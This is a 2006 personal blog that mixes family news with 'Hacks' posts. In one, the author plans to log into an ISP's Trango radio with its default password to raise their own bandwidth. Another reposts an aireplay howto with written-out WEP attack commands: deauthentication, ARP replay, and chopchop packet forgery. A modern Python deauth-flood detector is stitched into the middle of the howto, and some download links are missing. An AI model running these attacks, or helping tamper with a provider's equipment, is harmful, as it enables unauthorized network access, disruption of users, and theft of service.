You just got served.... 
Wednesday, April 19, 2006, 03:43 PM - Hacks
So, while trying to get Microserve to return our phone calls, the secretary mentioned that they flashed our antenna, which got me thinking. Since I know that they use a proprietary system involving Trango broadband, I hopped onto the Trango website and downloaded some of the PDF files.

1. They use proprietary MAC filtering to authenticate radios.
The Access5830 system is classified as a Layer 2 multi-point bridge. Authentication of the SUs (Subscriber Unit) is performed using a secure, proprietary method at the MAC level, and thus all forms of Ethernet traffic and unlimited IP addresses will pass seamlessly over the system. There is no limitation on the number of IP addresses or hardware devices that an individual SU may have physically connected to it.

2. The FOX series SUs operate in either the 5.8 GHz ISM band or the 5.3 GHz UNII band, which means the wifi G cards we use are not compatible (2.4 GHz).

3. Yes, you can login to the radio itself.
(radio default IP address=
Heh, simple enough?
Default password is trango

4. You can change your bandwidth via the antenna?!
(super sweet)

5. The AP and SU have to have matching info in them. The AP cannot be accessed via the SU unit, so it must be done physically (serial cable) or from within the network. Both the AP and SU have the same look to this interface.

6. None of this has been tested YET. I am thinking that the radio address is no longer, but it's not the static IP either; talking with a tech, I was told that the gateway is the tower and NOT the radio. I still need to do some hunting on the matter, but the pot of gold at the end of the rainbow looks promising.

x out.

6 in. of Snow 
Monday, April 17, 2006, 11:13 AM
We got over 6 inches of snow last night, and it's still snowing. The cars were completely covered. The good part is that none of it stuck to the roads, so they were not slick.

Still annoying for the middle of April.

Monday, April 17, 2006, 11:08 AM - Family
The Durango hit 100,000 miles yesterday on our way home from Salt Lake.

Funny, I think a tie bearing is going out too... we shall see tonight.

Thursday, April 6, 2006, 10:35 PM - Family
A BBQ at extremes house turned sour when a bottle of Worcestershire sauce was brutally murdered. The incident took place at about 6:13 pm. The bottle was found dead on arrival. No suspects have been named.

Love Sacs! 
Monday, April 3, 2006, 12:26 AM - Family
We went to SLC this past weekend. We went to the love sac store and got a new cover for our 6 foot sac. We got an olive colored microsuede, it's much nicer than our old fur.
While we were there, we saw something in the bargain bin, a 2 foot love sac. It was the same color and style as our old fur. For $20 we got a love sac for Abbey!

I'm more excited than she is! Oh well, she will like it more when she gets a bit older.

BBQ Fire 
Monday, March 27, 2006, 02:00 AM
So, uh, my BBQ caught fire while I was cooking some ribs.
No damage to the BBQ, but it was still odd that I had to use baking soda to put it out. Man, those ribs must have been super greasy!

aireplay mini-howto 
Friday, March 24, 2006, 03:10 PM - Hacks

Example test setup:

* Access Point (hostap) - 00:02:2D:AA:9C:13
* Wireless client (madwifi) - 00:09:5B:FC:21:F4
* Laptop with a Prism2, Atheros or Prism54 card

0. Changes since last release

* built-in chopchop operation mode
* added a bunch of options in aireplay
* added deauthentication frame forgery
* Prism2 (wlan-ng) USB device support
* Atheros (madwifi) and Prism54 device support

1. Driver recompilation

1.1. Installing linux-wlan-ng-0.2.1-pre26

First, make sure you have updated your card's station and primary
firmware with a recent version; I recommend STA 1.7.4 / PRI 1.1.1.

cd /usr/src
wget --passive-ftp
tar -xvjf linux-wlan-ng-0.2.1-pre26.tar.bz2
cd linux-wlan-ng-0.2.1-pre26
patch -Np1 -i ~/aireplay-2.2/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1
make config
make all
find /lib/modules \( -name 'p80211*' -o -name 'prism2*' \) -exec rm -v {} \;
make -C src install
cp etc/pcmcia/wlan-ng.conf /etc/pcmcia/
mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
/etc/init.d/pcmcia restart
(reinsert card)

1.2. Installing madwifi

Note: a tarball is also available at

cd /usr/src
cvs -z3 co madwifi
cd madwifi
patch -Np1 -i ~/aireplay-2.2/patch/madwifi-20050309.patch.0.1
make install
modprobe ath_pci

1.3. Installing prism54

Make sure the hotplug package is installed and hotplug firmware
loading support is present in your kernel (module firmware_class).

cd /usr/src
wget ... st.tar.bz2
tar -xvjf prism54-svn-latest.tar.bz2
cd prism54-svn-latest
make modules
make install
mkdir -p /usr/lib/hotplug/firmware
mv /usr/lib/hotplug/firmware/isl3890
modprobe prism54

2. Using aireplay

*** aireplay does not capture replies: ***
*** you must start airodump in parallel ***

If you use madwifi, you may have to place the card in
pure 802.11b mode first:

iwpriv ath0 mode 2

If you use wlan-ng, run ./ start wlan0 <channel>
Otherwise run:

iwconfig ath0 mode Monitor channel <channel>
ifconfig ath0 up

2.1. Attack 1: deauthentication

This attack is especially useful to capture an ESSID or a WPA handshake.

./airforge 00:02:2D:AA:9C:13 00:09:5B:FC:21:F4 deauth.pcap
./aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth.pcap ath0
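
Seen from the monitoring side, the burst of deauthentication frames described in 2.1 is easy to recognise. The sketch below is an added example, not part of the original howto or the aireplay code: it parses raw 802.11 headers (assumed to carry no radiotap/Prism header and no FCS) and flags AP/station pairs with an abnormal deauthentication rate. The sample frames are constructed from the test-setup MACs above, and the window and threshold values are assumptions to tune per site.

```python
import struct
from collections import defaultdict

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for a deauthentication frame, else None."""
    if len(frame) < 26:                    # 24-byte header + 2-byte reason code
        return None
    fc = frame[0]
    version, ftype, subtype = fc & 0x3, (fc >> 2) & 0x3, fc >> 4
    if (version, ftype, subtype) != (0, 0, 12):   # management / deauthentication
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def detect_deauth_floods(capture, window=1.0, threshold=5):
    """capture: iterable of (timestamp_s, raw_frame) in time order.
    Returns {(bssid, station): peak deauth count seen within `window` seconds}
    for pairs reaching `threshold` (both values are assumptions, tune per site)."""
    recent, peak = defaultdict(list), defaultdict(int)
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        dst, src, bssid, _reason = parsed
        station = dst if src == bssid else src     # the non-AP side of the pair
        key = (bssid, station)
        recent[key] = [t for t in recent[key] if ts - t < window] + [ts]
        peak[key] = max(peak[key], len(recent[key]))
    return {k: n for k, n in peak.items() if n >= threshold}

# Constructed sample frames (hex), using the MACs from the test setup above.
AP, STA = "00022daa9c13", "00095bfc21f4"
BEACON = bytes.fromhex("80000000" + "ffffffffffff" + AP + AP + "0000" + "00" * 12)
LEAVE = bytes.fromhex("c0003a01" + AP + "001122334455" + AP + "1000" + "0300")
BURST = bytes.fromhex("c0003a01" + STA + AP + AP + "0000" + "0700")
SAMPLE_CAPTURE = ([(0.00, BEACON), (0.10, LEAVE)]
                  + [(1.0 + i * 0.05, BURST) for i in range(12)])

if __name__ == "__main__":
    for (bssid, station), n in detect_deauth_floods(SAMPLE_CAPTURE).items():
        print(f"deauth flood: bssid={bssid} station={station} peak={n} in window")
```

Detection only reports the burst; 802.11w management frame protection is what makes forged deauthentication frames ineffective against clients that support it.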

2.2. Attack 2: classic arp-request resend

./aireplay -f 0 -t 1 -m 68 -n 68 -d FF:FF:FF:FF:FF:FF ath0

2.3. Attack 3: data broadcast resend

This attack is quite unreliable and often doesn't work. You need
the MAC address of an authenticated station so that the AP will
not drop the packets. As most APs work in open authentication mode,
if you have another wireless card, you can simply associate it
and use its MAC address.

./aireplay -h 00:09:5B:FC:21:F4 -c FF:FF:FF:FF:FF:FF -o 08 -p 41 ath0

2.4. Attack 4: arp-request forgery

First, we need a prga by decrypting a data packet. For this, add the -k
flag which will enable KoreK's chopchop attack:

./aireplay -k eth1

This attack may not work in deauthenticated mode (in which the source
MAC address is forged). If this is the case, you will have to pass the
address of an authenticated station:

./aireplay -h 00:09:5B:FC:21:F4 -k eth1

Have a look at the decrypted packet:

tcpdump -e -n -t -r replay_dec-050320-023844.pcap

BSSID:00:02:2d:aa:9c:13 SA:00:09:5b:fc:21:f4 DA:00:05:1b:44:8a:ce LLC, dsap
SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03, IP > S
2961438793:2961438793(0) win 5840 <mss 1460,sackOK,...>

Now we have enough information to forge an ARP request:

./airforge replay_dec-050320-023844.prga 1 00:02:2d:aa:9c:13 \
00:09:5b:fc:21:f4 arp.pcap

And finally:

./aireplay -r arp.pcap ath0
